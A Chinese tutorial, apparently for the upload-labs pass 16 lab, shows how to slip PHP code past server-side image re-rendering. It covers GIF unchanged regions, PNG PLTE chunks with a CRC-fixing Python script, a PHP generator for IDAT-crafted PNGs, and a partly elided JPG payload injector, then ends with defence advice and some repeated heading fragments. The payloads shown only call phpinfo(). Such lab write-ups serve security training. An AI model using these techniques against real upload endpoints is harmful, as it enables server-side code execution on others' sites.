绕过文件上传二次渲染技术详解<\/h1>

1. 二次渲染概述<\/h2>
二次渲染是指服务器在接收上传的图片文件后，会对其进行重新处理（如压缩、格式转换等），这通常会导致嵌入在图片中的恶意代码被清除。upload-labs pass 16关卡考察的就是如何绕过这种安全机制。<\/p>

2. GIF文件绕过技术<\/h2>

2.1 基本原理<\/h3>

GIF文件二次渲染后，某些数据区域保持不变<\/li>

找到这些不变区域插入PHP代码即可绕过<\/li> <\/ul>

2.2 操作步骤<\/h3>

准备一个正常的GIF图片<\/li>
使用十六进制编辑器在文件尾部添加PHP代码，如<?php phpinfo(); ?><\/code><\/li>
上传后下载渲染后的文件进行对比<\/li>
通过对比找到未被修改的数据区域（通常为中间蓝色部分）<\/li>
将PHP代码插入到这些不变区域中<\/li>

重新上传修改后的GIF文件<\/li>
<\/ol>
2.3 验证方法<\/h3>

下载服务器上的文件<\/li>
使用十六进制编辑器检查PHP代码是否保留<\/li>
<\/ul>
3. PNG文件绕过技术<\/h2>
3.1 PNG文件结构<\/h3>
PNG由多个数据块组成，关键数据块包括：<\/p>

IHDR<\/strong>：文件头数据块（必须第一个出现）<\/li>
PLTE<\/strong>：调色板数据块（索引彩色图像必需）<\/li>
IDAT<\/strong>：图像数据块（存储实际图像数据）<\/li>
IEND<\/strong>：图像结束数据块（必须位于文件尾部）<\/li>
<\/ul>
3.2 通过PLTE数据块绕过<\/h3>
适用条件<\/strong>：仅对索引彩色图像（IHDR中color type为03）有效<\/p>
操作步骤<\/strong>：<\/p>

使用十六进制编辑器在PLTE数据块中插入PHP代码<\/li>
重新计算CRC校验值（算法：x³²+x²⁶+x²³+x²²+x¹⁶+x¹²+x¹¹+x¹⁰+x⁸+x⁷+x⁵+x⁴+x²+x+1）<\/li>
使用Python脚本计算新CRC：<\/li>
<\/ol>
import<\/span> binascii
<\/span><\/span>import<\/span> re
<\/span><\/span>
<\/span><\/span>png =<\/span> open(r<\/span>'2.png'<\/span>,'rb'<\/span>)
<\/span><\/span>a =<\/span> png.<\/span>read()
<\/span><\/span>png.<\/span>close()
<\/span><\/span>hexstr =<\/span> binascii.<\/span>b2a_hex(a)
<\/span><\/span>
<\/span><\/span># PLTE crc计算<\/span>
<\/span><\/span>data =<\/span> '504c5445'<\/span> +<\/span> re.<\/span>findall('504c5445(.*?)49444154'<\/span>,hexstr)[0<\/span>]
<\/span><\/span>crc =<\/span> binascii.<\/span>crc32(data[:-<\/span>16<\/span>].<\/span>decode('hex'<\/span>)) &<\/span> 0xffffffff<\/span>
<\/span><\/span>print hex(crc)
<\/span><\/span><\/code><\/pre>
修改文件中的CRC值为计算结果<\/li>
上传并验证<\/li>
<\/ol>
3.3 通过IDAT数据块绕过<\/h3>
使用专门生成的PNG文件：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>$p =<\/span> array<\/span>(0xa3<\/span>, 0x9f<\/span>, 0x67<\/span>, 0xf7<\/span>, 0x0e<\/span>, 0x93<\/span>, 0x1b<\/span>, 0x23<\/span>, 0xbe<\/span>, 0x2c<\/span>, 0x8a<\/span>, 0xd0<\/span>, 0x80<\/span>, 0xf9<\/span>, 0xe1<\/span>, 0xae<\/span>, 0x22<\/span>, 0xf6<\/span>, 0xd9<\/span>, 0x43<\/span>, 0x5d<\/span>, 0xfb<\/span>, 0xae<\/span>, 0xcc<\/span>, 0x5a<\/span>, 0x01<\/span>, 0xdc<\/span>, 0x5a<\/span>, 0x01<\/span>, 0xdc<\/span>, 0xa3<\/span>, 0x9f<\/span>, 0x67<\/span>, 0xa5<\/span>, 0xbe<\/span>, 0x5f<\/span>, 0x76<\/span>, 0x74<\/span>, 0x5a<\/span>, 0x4c<\/span>, 0xa1<\/span>, 0x3f<\/span>, 0x7a<\/span>, 0xbf<\/span>, 0x30<\/span>, 0x6b<\/span>, 0x88<\/span>, 0x2d<\/span>, 0x60<\/span>, 0x65<\/span>, 0x7d<\/span>, 0x52<\/span>, 0x9d<\/span>, 0xad<\/span>, 0x88<\/span>, 0xa1<\/span>, 0x66<\/span>, 0x44<\/span>, 0x50<\/span>, 0x33<\/span>);
<\/span><\/span>
<\/span><\/span>$img =<\/span> imagecreatetruecolor<\/span>(32<\/span>, 32<\/span>);
<\/span><\/span>for<\/span> ($y =<\/span> 0<\/span>; $y <<\/span> sizeof<\/span>($p); $y +=<\/span> 3<\/span>) {
<\/span><\/span>    $r =<\/span> $p[$y];
<\/span><\/span>    $g =<\/span> $p[$y+<\/span>1<\/span>];
<\/span><\/span>    $b =<\/span> $p[$y+<\/span>2<\/span>];
<\/span><\/span>    $color =<\/span> imagecolorallocate<\/span>($img, $r, $g, $b);
<\/span><\/span>    imagesetpixel<\/span>($img, round<\/span>($y \/<\/span> 3<\/span>), 0<\/span>, $color);
<\/span><\/span>}
<\/span><\/span>imagepng<\/span>($img,'.\/1.png'<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>4. JPG文件绕过技术<\/h2>
4.1 使用专用工具<\/h3>
使用jpg_payload.php<\/code>脚本处理JPG文件：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>\/* 
<\/span><\/span><\/span>JPG Payload注入脚本，保持处理后不变
<\/span><\/span><\/span>要求初始图像的大小和质量与处理后相同
<\/span><\/span><\/span>*\/<\/span>
<\/span><\/span>
<\/span><\/span>$miniPayload =<\/span> "<?=phpinfo();?>"<\/span>;
<\/span><\/span>
<\/span><\/span>\/\/ 检查GD库
<\/span><\/span><\/span><\/span>if<\/span>(!<\/span>extension_loaded<\/span>('gd'<\/span>) ||<\/span> !<\/span>function_exists<\/span>('imagecreatefromjpeg'<\/span>)) {
<\/span><\/span>    die<\/span>('php-gd is not installed'<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 使用方法: php jpg_payload.php <jpg_name.jpg>
<\/span><\/span><\/span>\/\/ 详细代码见原文...
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>4.2 操作步骤<\/h3>

准备一个JPG图片并上传到服务器<\/li>
下载服务器处理后的图片保存为1.jpg<\/li>
使用脚本处理：php jpg_payload.php 1.jpg<\/code><\/li>
上传生成的payload_1.jpg<\/li>
验证是否成功<\/li>
<\/ol>
4.3 注意事项<\/h3>

不是所有JPG图片都能成功处理<\/li>
可能需要尝试多个不同的JPG文件<\/li>
如果失败，尝试修改payload或在开头添加一些字符<\/li>
<\/ul>
5. 验证方法<\/h2>
对于所有文件类型，验证步骤相同：<\/p>

上传文件到服务器<\/li>
从服务器下载处理后的文件<\/li>
使用十六进制编辑器检查文件中是否还包含PHP代码<\/li>
如果代码存在，则绕过成功<\/li>
<\/ol>
6. 技术要点总结<\/h2>

GIF文件<\/strong>：利用二次渲染中不变的数据区域插入代码<\/li>
PNG文件<\/strong>：

通过PLTE数据块（仅限索引彩色图像）<\/li>
通过特殊构造的IDAT数据块<\/li>
<\/ul>
<\/li>
JPG文件<\/strong>：使用专用脚本在特定位置注入payload<\/li>
关键是要理解每种图片格式的数据结构<\/li>
所有方法都需要重新计算和修正校验值（如CRC）<\/li>
<\/ol>
7. 防御建议<\/h2>

除了二次渲染，还应结合其他安全措施：

文件类型白名单验证<\/li>
文件内容检测<\/li>
随机重命名上传文件<\/li>
设置适当的文件权限<\/li>
<\/ul>
<\/li>
禁用上传文件的执行权限<\/li>
将上传文件存储在非web可访问目录，通过脚本间接访问<\/li>
<\/ol>

绕过文件上传二次渲染技术详解<\/h1>

1. 二次渲染概述<\/h2> 二次渲染是指服务器在接收上传的图片文件后，会对其进行重新处理（如压缩、格式转换等），这通常会导致嵌入在图片中的恶意代码被清除。upload-labs pass 16关卡考察的就是如何绕过这种安全机制。<\/p>

2. GIF文件绕过技术<\/h2>

3. PNG文件绕过技术<\/h2>

4. JPG文件绕过技术<\/h2>

1. 二次渲染概述<\/h2>
二次渲染是指服务器在接收上传的图片文件后，会对其进行重新处理（如压缩、格式转换等），这通常会导致嵌入在图片中的恶意代码被清除。upload-labs pass 16关卡考察的就是如何绕过这种安全机制。<\/p>